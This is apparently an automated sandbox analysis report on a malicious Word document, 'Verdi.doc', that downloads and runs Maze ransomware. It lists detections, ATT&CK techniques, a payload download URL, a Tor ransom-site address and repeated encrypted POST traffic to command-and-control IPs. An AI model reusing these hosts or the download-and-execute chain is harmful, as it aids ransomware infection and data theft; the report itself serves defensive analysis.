Play interactive tour

Edit tour

Analysis Report Verdi.doc

Overview

General Information

Joe Sandbox Version:	28.0.0 Lapis Lazuli
Analysis ID:	992382
Start date:	06.11.2019
Start time:	14:01:16
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Verdi.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spre.phis.spyw.expl.evad.winDOC@9/176@0/9
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 17.8% (good quality ratio 17.1%) Quality average: 95.2% Quality standard deviation: 19.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe, WMIADAP.exe, conhost.exe, mscorsvw.exe, VSSVC.exe, svchost.exe Execution Graph export aborted for target WINWORD.EXE, PID 3180 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. Report size getting too big, too many NtWriteFile calls found.

Detection

Strategy	Score	Range	Reporting	Whitelisted	Threat	Detection
Threshold	100	0 - 100	Report FP / FN	false	Maze

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample does not show any behavior and checks for the installed Java version. Likely requires a different JRE version.

Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Valid Accounts	Windows Management Instrumentation1	Startup Items2	Startup Items2	Software Packing21	Credential Dumping1	Security Software Discovery31	Remote File Copy14	Man in the Browser1	Data Encrypted11	Remote File Copy14
Replication Through Removable Media	Scripting11	Registry Run Keys / Startup Folder2	Process Injection1	Scripting11	Network Sniffing	File and Directory Discovery11	Taint Shared Content1	Data from Local System11	Exfiltration Over Other Network Medium	Standard Cryptographic Protocol2
Drive-by Compromise	Exploitation for Client Execution32	Hidden Files and Directories1	Path Interception	File Deletion1	Input Capture	System Information Discovery22	Windows Remote Management	Data from Network Shared Drive	Automated Exfiltration	Standard Non-Application Layer Protocol3
Exploit Public-Facing Application	Scheduled Task	System Firmware	DLL Search Order Hijacking	Obfuscated Files or Information1	Credentials in Files	Query Registry1	Logon Scripts	Input Capture	Data Encrypted	Standard Application Layer Protocol23
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Masquerading21	Account Manipulation	Process Discovery2	Shared Webroot	Data Staged	Scheduled Transfer	Connection Proxy1
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	Hidden Files and Directories1	Brute Force	Application Window Discovery1	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port
Spearphishing via Service	Scripting	Path Interception	Scheduled Task	Process Injection1	Two-Factor Authentication Interception	Remote System Discovery1	Pass the Hash	Email Collection	Exfiltration Over Command and Control Channel	Uncommonly Used Port

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://104.168.198.208/wordupd.tmp

Avira URL Cloud: Label: malware

Antivirus or Machine Learning detection for dropped file

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Avira: detection malicious, Label: TR/AD.MazeRansom.gvzeo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	Avira: detection malicious, Label: TR/AD.MazeRansom.gvzeo
Source: C:\Windows\Temp\wupd12.14.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for sample

Show sources

Source: Verdi.doc	Avira: detection malicious, Label: VBA/Dldr.Agent.xgnwi
Source: Verdi.doc	Joe Sandbox ML: detected

Multi AV Scanner detection for submitted file

Show sources

Source: Verdi.doc

Virustotal: Detection: 50%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Show sources

Source: 5.2.wupd12.14.tmp.560000.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.wupd12.14.tmp.4c0000.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.wupd12.14.tmp.400000.0.unpack	Avira: Label: TR/AD.MazeRansom.gvzeo

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_0042300D EqualDomainSid,AnimateWindow,HeapAlloc,TlsGetValue,GetLastError,LookupAccountSidW,CryptGenRandom,LsaQueryTrustedDomainInfo,AnimateWindow,	5_2_0042300D
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004028C4 EncryptionDisable,	5_2_004028C4
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_00403ECB EncryptionDisable,	5_2_00403ECB
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004268A0 EncryptionDisable,	5_2_004268A0
Source: C:\Windows\Temp\wupd12.14.tmp	Code function: 5_2_004219E0 EntryPoint,EqualDomainSid,AnimateWindow,HeapAlloc,TlsGetValue,GetLastError,LookupAccountSidW,CryptGenRandom,LsaQueryTrustedDomainInfo,AnimateWindow,EnumChildWindows,EnumChildWindows,LsaFreeMemory,HeapAlloc,EqualDomainSid,LsaFreeMemory,EqualDomainSid,DestroyWindow,LsaClose,DeferWindowPos,SelectPalette,	5_2_004219E0

Spreading:

Infects executable files (exe, dll, sys, html)

Show sources

Source: C:\Windows\Temp\wupd12.14.tmp	System file mapped for write: C:\Users\user\AppData\Roaming\.jre\Welcome.html			Jump to behavior
Source: C:\Windows\Temp\wupd12.14.tmp	System file written: C:\Users\user\AppData\Roaming\.jre\Welcome.html			Jump to behavior

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: wordupd[1].tmp.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\Temp\wupd12.14.tmp

Jump to behavior

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 104.168.198.208:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 104.168.198.208:80

Networking:

Found Tor onion address

Show sources

Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp	String found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID%
Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp	String found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
Source: notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp	String found in binary or memory: d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Nov 2019 13:02:48 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Tue, 29 Oct 2019 17:33:53 GMTETag: "b0e00-59610051d4240"Accept-Ranges: bytesContent-Length: 724480Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 98 74 b8 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 06 00 84 09 00 00 7e 01 00 00 06 00 00 f7 11 00 00 00 90 09 00 00 90 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 0b 00 00 04 00 00 72 03 0c 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 0

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /wordupd.tmp HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.198.208Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /signout/login/ct.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)s
Source: global traffic	HTTP traffic detected: POST /signout/login/ct.html HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Length: 237Cache-Control: no-cacheData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)
Source: global traffic	HTTP traffic detected: POST /forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.11Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgU
Source: global traffic	HTTP traffic detected: POST /frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.25Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G
Source: global traffic	HTTP traffic detected: POST /post/yocs.jspx?mh=gvs58 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.26Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=
Source: global traffic	HTTP traffic detected: POST /checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.32Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgU
Source: global traffic	HTTP traffic detected: POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.37Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_
Source: global traffic	HTTP traffic detected: POST /edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.37Content-Length: 237Cache-Control: no-cacheData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_
Source: global traffic	HTTP traffic detected: POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global traffic	HTTP traffic detected: POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Length: 49Cache-Control: no-cacheData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global traffic	HTTP traffic detected: POST /view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.11Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global traffic	HTTP traffic detected: POST /tracker/lpvotht.php?ij=74lh01y&if=3h00sur HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.25Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global traffic	HTTP traffic detected: POST /weu.html?n=641&uy=33vt2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.26Content-Type: application/x-www-form-urlencodedContent-Length: 49Connection: Keep-AliveData Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Source: global traffic	HTTP traffic detected: POST /edit/signout/r.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.38Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sO
Source: global traffic	HTTP traffic detected: POST /edit/signout/r.html HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.38Content-Length: 237Cache-Control: no-cacheData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)s

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.198.208
